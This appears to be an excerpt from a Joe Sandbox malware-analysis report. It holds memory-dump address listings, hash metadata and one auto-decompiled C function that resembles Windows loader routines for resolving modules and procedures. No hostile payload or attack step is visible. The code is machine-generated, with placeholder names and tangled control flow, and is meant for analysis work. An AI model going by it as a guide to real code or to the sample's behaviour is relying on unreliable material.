                                          0x010d21c8
                                          0x010d21cc
                                          0x010d21d0
                                          0x010d21d4
                                          0x010d21de
                                          0x010d21e3
                                          0x01115a29
                                          0x01115a2c
                                          0x00000000
                                          0x00000000
                                          0x01115a3b
                                          0x00000000
                                          0x010d21e9
                                          0x010d21e9
                                          0x010d21e9
                                          0x010d21ee
                                          0x010d21f1
                                          0x01115a45
                                          0x01115a4b
                                          0x01115a52
                                          0x01115a58
                                          0x01115a5d
                                          0x01115a5f
                                          0x01115a71
                                          0x01115a61
                                          0x01115a6a
                                          0x01115a6a
                                          0x01115a76
                                          0x01115a79
                                          0x01115a7f
                                          0x01115a83
                                          0x01115a85
                                          0x01115a87
                                          0x01115a87
                                          0x01115a8c
                                          0x01115a91
                                          0x01115a97
                                          0x01115a9f
                                          0x01115aa0
                                          0x01115aa1
                                          0x01115aa6
                                          0x01115aab
                                          0x01115ab1
                                          0x01115ab3
                                          0x01115ab9
                                          0x01115aca
                                          0x01115ad4
                                          0x01115ad4
                                          0x01115ade
                                          0x01115ade
                                          0x01115aab
                                          0x01115a79
                                          0x01115a52
                                          0x010d21f7
                                          0x010d21f9
                                          0x010d21fe
                                          0x010d21fe
                                          0x010d21e3
                                          0x010d2195
                                          0x010d236c
                                          0x010d2122
                                          0x010d2122
                                          0x010d2124
                                          0x010d2231
                                          0x010d2236
                                          0x010d2236
                                          0x010d2238
                                          0x010d2238
                                          0x010d2240
                                          0x010d2242
                                          0x010d2244
                                          0x011159fc
                                          0x010d218c
                                          0x010d218c
                                          0x00000000
                                          0x010d218c
                                          0x010d224a
                                          0x010d224f
                                          0x010d2256
                                          0x010d2304
                                          0x010d2309
                                          0x010d230f
                                          0x010d231e
                                          0x010d231e
                                          0x010d231e
                                          0x010d2320
                                          0x010d2325
                                          0x010d232a
                                          0x010d232c
                                          0x010d233e
                                          0x010d233e
                                          0x00000000
                                          0x010d232c
                                          0x010d2311
                                          0x010d2317
                                          0x010d231a
                                          0x010d231c
                                          0x010d2380
                                          0x010d2380
                                          0x010d2380
                                          0x010d2384
                                          0x00000000
                                          0x00000000
                                          0x010d2386
                                          0x00000000
                                          0x010d231c
                                          0x010d225c
                                          0x010d225c
                                          0x00000000
                                          0x010d225c
                                          0x010d212a
                                          0x010d2134
                                          0x010d2138
                                          0x010d213d
                                          0x01115858
                                          0x01115863
                                          0x01115863
                                          0x01115867
                                          0x0111586a
                                          0x00000000
                                          0x00000000
                                          0x0111586c
                                          0x0111586c
                                          0x01115871
                                          0x01115875
                                          0x01115877
                                          0x01115997
                                          0x0111599c
                                          0x011159a1
                                          0x011159a7
                                          0x011159a7
                                          0x00000000
                                          0x011159a7
                                          0x0111587d
                                          0x00000000
                                          0x0111588b
                                          0x0111588b
                                          0x01115890
                                          0x01115892
                                          0x01115894
                                          0x01115899
                                          0x0111589b
                                          0x011158a0
                                          0x011158a0
                                          0x011158aa
                                          0x011158b2
                                          0x011158b6
                                          0x011158be
                                          0x011158c6
                                          0x011158c9
                                          0x0111590d
                                          0x01115917
                                          0x0111591a
                                          0x0111591c
                                          0x01115920
                                          0x01115928
                                          0x0111592a
                                          0x0111592c
                                          0x0111592e
                                          0x0111592e
                                          0x011158cb
                                          0x011158cd
                                          0x011158d8
                                          0x011158e0
                                          0x011158f4
                                          0x011158fe
                                          0x011158fe
                                          0x0111593a
                                          0x0111593e
                                          0x01115940
                                          0x01115942
                                          0x00000000
                                          0x01115944
                                          0x01115944
                                          0x01115949
                                          0x0111594e
                                          0x0111594e
                                          0x01115953
                                          0x0111595b
                                          0x01115976
                                          0x01115976
                                          0x0111597a
                                          0x0111597f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01115981
                                          0x01115981
                                          0x01115981
                                          0x01115983
                                          0x01115988
                                          0x0111598d
                                          0x01115991
                                          0x01115991
                                          0x00000000
                                          0x0111595d
                                          0x0111595d
                                          0x01115963
                                          0x01115965
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01115967
                                          0x01115967
                                          0x0111596b
                                          0x0111596d
                                          0x00000000
                                          0x00000000
                                          0x0111596f
                                          0x01115971
                                          0x01115971
                                          0x01115974
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01115974
                                          0x00000000
                                          0x01115967
                                          0x0111595b
                                          0x01115942
                                          0x01115863
                                          0x010d2143
                                          0x010d2143
                                          0x010d2149
                                          0x010d214f
                                          0x010d22f1
                                          0x010d22f6
                                          0x00000000
                                          0x010d2173
                                          0x010d2173
                                          0x010d217d
                                          0x010d2181
                                          0x010d2186
                                          0x011159ae
                                          0x011159b2
                                          0x011159b5
                                          0x011159b7
                                          0x011159ba
                                          0x011159cd
                                          0x011159d1
                                          0x011159d5
                                          0x011159d9
                                          0x011159db
                                          0x00000000
                                          0x00000000
                                          0x011159dd
                                          0x011159dd
                                          0x011159e1
                                          0x011159e4
                                          0x011159e7
                                          0x011159ee
                                          0x011159ee
                                          0x011159f3
                                          0x011159f3
                                          0x00000000
                                          0x010d2186
                                          0x010d214f
                                          0x010d2106
                                          0x010d2266
                                          0x010d20d8
                                          0x010d20da
                                          0x010d20e0
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ddd2ae95cbce76db271406ce8134c43a92ff6a76a4259f604b206fb8afe7c32
                                          • Instruction ID: 01fafb91e34117399d8137ba680f28ada09164aa3613deb15886fe5c4cafdc56
                                          • Opcode Fuzzy Hash: 8ddd2ae95cbce76db271406ce8134c43a92ff6a76a4259f604b206fb8afe7c32
                                          • Instruction Fuzzy Hash: 83F1E2356083419FDB6ACF2CC84076ABBE2AFD6324F04856DF9D59B285D734D841CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010BD5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E010BD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x119d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E010B6600(0x11952d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1197b9c; // 0x0
							_t281 = L010C4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E010EF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1197b90; // 0x77090000
								if(_t384 == 0) {
									_t353 =  *0x1197b8c; // 0xb52a88
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E010C2280(_t200, 0x11984d8);
									_t277 =  *0x11985f4; // 0xb52f78
									_t351 =  *0x11985f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xb52f10
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E010BFFB0(_t287, _t353, 0x11984d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E010FCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E010B6600(0x11952d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E010B7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x119b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0112E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1198472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x119b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x119b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E010C2280(_t250, 0x11984d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L010E3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E010BFFB0(_t293, _t353, 0x11984d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E010E37F5(_t353, 0);
																}
																E010E0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E010D9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E010D02D6(_t174);
																}
																L010C77F0( *0x1197b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E010DC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L010BEC7F(_t353);
										L010D19B8(_t287, 0, _t353, 0);
										_t200 = E010AF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x119b2f8 |  *0x119b2fc) == 0 || ( *0x119b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E010EB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x119b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01156B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01156AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E010BE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L010BEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E010E9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E010BE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L010B8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E010E3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                          0x010bd5f2
                                          0x010bd5f5
                                          0x010bd5f5
                                          0x010bd5fd
                                          0x010bd600
                                          0x010bd60a
                                          0x010bd60d
                                          0x010bd617
                                          0x010bd61d
                                          0x010bd627
                                          0x010bd62e
                                          0x010bd911
                                          0x010bd913
                                          0x00000000
                                          0x010bd919
                                          0x010bd919
                                          0x010bd919
                                          0x010bd634
                                          0x010bd634
                                          0x010bd634
                                          0x010bd634
                                          0x010bd640
                                          0x010bd8bf
                                          0x00000000
                                          0x010bd646
                                          0x010bd646
                                          0x010bd64d
                                          0x010bd652
                                          0x0110b2fc
                                          0x0110b2fc
                                          0x0110b302
                                          0x0110b33b
                                          0x0110b341
                                          0x00000000
                                          0x0110b304
                                          0x0110b304
                                          0x0110b319
                                          0x0110b31e
                                          0x0110b324
                                          0x0110b326
                                          0x0110b332
                                          0x0110b347
                                          0x0110b34c
                                          0x0110b351
                                          0x0110b35a
                                          0x00000000
                                          0x0110b328
                                          0x0110b328
                                          0x00000000
                                          0x0110b328
                                          0x0110b326
                                          0x010bd658
                                          0x010bd658
                                          0x010bd65b
                                          0x010bd665
                                          0x00000000
                                          0x010bd66b
                                          0x010bd66b
                                          0x010bd66b
                                          0x010bd66b
                                          0x010bd66d
                                          0x010bd672
                                          0x010bd67a
                                          0x00000000
                                          0x00000000
                                          0x010bd680
                                          0x010bd686
                                          0x010bd8ce
                                          0x010bd8d4
                                          0x010bd8dd
                                          0x010bd8e0
                                          0x010bd68c
                                          0x010bd691
                                          0x010bd69d
                                          0x010bd6a2
                                          0x010bd6a7
                                          0x010bd6b0
                                          0x010bd6b5
                                          0x010bd6e0
                                          0x010bd6b7
                                          0x010bd6b7
                                          0x010bd6b9
                                          0x010bd6b9
                                          0x010bd6bb
                                          0x010bd6bd
                                          0x010bd6ce
                                          0x010bd6d0
                                          0x010bd6d2
                                          0x0110b363
                                          0x0110b365
                                          0x00000000
                                          0x0110b36b
                                          0x00000000
                                          0x0110b36b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010bd6bf
                                          0x010bd6bf
                                          0x010bd6e5
                                          0x010bd6e7
                                          0x010bd6e9
                                          0x010bd6ec
                                          0x010bd6ec
                                          0x010bd6ef
                                          0x010bd6f5
                                          0x010bd6f9
                                          0x010bd6fb
                                          0x010bd6fd
                                          0x010bd701
                                          0x010bd703
                                          0x010bd70a
                                          0x010bd70a
                                          0x010bd701
                                          0x010bd710
                                          0x010bd710
                                          0x010bd6c1
                                          0x010bd6c1
                                          0x010bd6c6
                                          0x0110b36d
                                          0x0110b36f
                                          0x00000000
                                          0x0110b375
                                          0x0110b375
                                          0x0110b375
                                          0x00000000
                                          0x0110b375
                                          0x00000000
                                          0x010bd6cc
                                          0x010bd6d8
                                          0x010bd6d8
                                          0x010bd6d8
                                          0x00000000
                                          0x010bd6c6
                                          0x010bd6bf
                                          0x00000000
                                          0x010bd6da
                                          0x010bd6da
                                          0x010bd716
                                          0x010bd71b
                                          0x010bd720
                                          0x010bd726
                                          0x010bd726
                                          0x010bd72d
                                          0x00000000
                                          0x010bd733
                                          0x010bd739
                                          0x010bd742
                                          0x010bd750
                                          0x010bd758
                                          0x010bd764
                                          0x010bd776
                                          0x010bd77a
                                          0x010bd783
                                          0x010bd928
                                          0x010bd92c
                                          0x010bd93d
                                          0x010bd944
                                          0x010bd94f
                                          0x010bd954
                                          0x010bd956
                                          0x010bd95f
                                          0x010bd961
                                          0x010bd973
                                          0x010bd973
                                          0x010bd956
                                          0x010bd944
                                          0x010bd92c
                                          0x010bd78b
                                          0x0110b394
                                          0x010bd791
                                          0x010bd798
                                          0x0110b3a3
                                          0x0110b3bb
                                          0x0110b3bb
                                          0x010bd7a5
                                          0x010bd866
                                          0x010bd870
                                          0x010bd892
                                          0x010bd898
                                          0x010bd89e
                                          0x010bd8a0
                                          0x010bd8a6
                                          0x010bd8ac
                                          0x010bd8ae
                                          0x010bd8b4
                                          0x010bd8b4
                                          0x010bd8ae
                                          0x010bd7a5
                                          0x010bd78b
                                          0x010bd7b1
                                          0x0110b3c5
                                          0x0110b3c5
                                          0x010bd7c3
                                          0x010bd7ca
                                          0x010bd7e5
                                          0x010bd7eb
                                          0x010bd8eb
                                          0x010bd8ed
                                          0x00000000
                                          0x010bd8f3
                                          0x010bd8f3
                                          0x010bd8f3
                                          0x00000000
                                          0x010bd8ed
                                          0x010bd7cc
                                          0x010bd7cc
                                          0x010bd7d2
                                          0x00000000
                                          0x010bd7d4
                                          0x010bd7d4
                                          0x010bd7d7
                                          0x010bd7df
                                          0x0110b3d4
                                          0x0110b3d9
                                          0x0110b3dc
                                          0x0110b3dc
                                          0x0110b3df
                                          0x0110b3e2
                                          0x0110b468
                                          0x0110b46d
                                          0x0110b46f
                                          0x0110b46f
                                          0x0110b475
                                          0x010bd8f8
                                          0x010bd8f9
                                          0x010bd8fd
                                          0x0110b3e8
                                          0x0110b3e8
                                          0x0110b3eb
                                          0x0110b3ed
                                          0x00000000
                                          0x0110b3ef
                                          0x0110b3ef
                                          0x0110b3f1
                                          0x0110b3f4
                                          0x0110b3fe
                                          0x0110b404
                                          0x0110b409
                                          0x0110b40e
                                          0x0110b410
                                          0x0110b410
                                          0x0110b414
                                          0x0110b414
                                          0x0110b41b
                                          0x0110b420
                                          0x0110b423
                                          0x0110b425
                                          0x0110b427
                                          0x0110b42a
                                          0x0110b42d
                                          0x0110b42d
                                          0x0110b42a
                                          0x0110b432
                                          0x0110b436
                                          0x0110b438
                                          0x0110b43b
                                          0x0110b43b
                                          0x0110b449
                                          0x0110b44e
                                          0x0110b454
                                          0x0110b458
                                          0x0110b458
                                          0x0110b45d
                                          0x00000000
                                          0x0110b45d
                                          0x0110b3ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010bd7df
                                          0x010bd7d2
                                          0x010bd7ca
                                          0x0110b37c
                                          0x0110b37e
                                          0x0110b385
                                          0x0110b38a
                                          0x00000000
                                          0x0110b38a
                                          0x010bd742
                                          0x010bd7f1
                                          0x010bd7f8
                                          0x0110b49b
                                          0x0110b49b
                                          0x010bd800
                                          0x010bd837
                                          0x010bd843
                                          0x010bd845
                                          0x010bd847
                                          0x010bd84a
                                          0x010bd84b
                                          0x010bd84e
                                          0x010bd857
                                          0x010bd818
                                          0x010bd824
                                          0x010bd831
                                          0x0110b4a5
                                          0x0110b4ab
                                          0x0110b4b3
                                          0x0110b4b8
                                          0x0110b4bb
                                          0x00000000
                                          0x0110b4c1
                                          0x0110b4c1
                                          0x0110b4c8
                                          0x00000000
                                          0x0110b4ce
                                          0x0110b4d4
                                          0x0110b4e1
                                          0x0110b4e3
                                          0x0110b4e5
                                          0x00000000
                                          0x0110b4eb
                                          0x0110b4f0
                                          0x0110b4f2
                                          0x010bdac9
                                          0x010bdacc
                                          0x010bdacf
                                          0x010bdad1
                                          0x010bdd78
                                          0x010bdd78
                                          0x010bdcf2
                                          0x00000000
                                          0x010bdad7
                                          0x010bdad9
                                          0x010bdadb
                                          0x00000000
                                          0x00000000
                                          0x010bdae1
                                          0x010bdae1
                                          0x010bdae4
                                          0x010bdae6
                                          0x0110b4f9
                                          0x0110b4f9
                                          0x0110b500
                                          0x010bdaec
                                          0x010bdaec
                                          0x010bdaf5
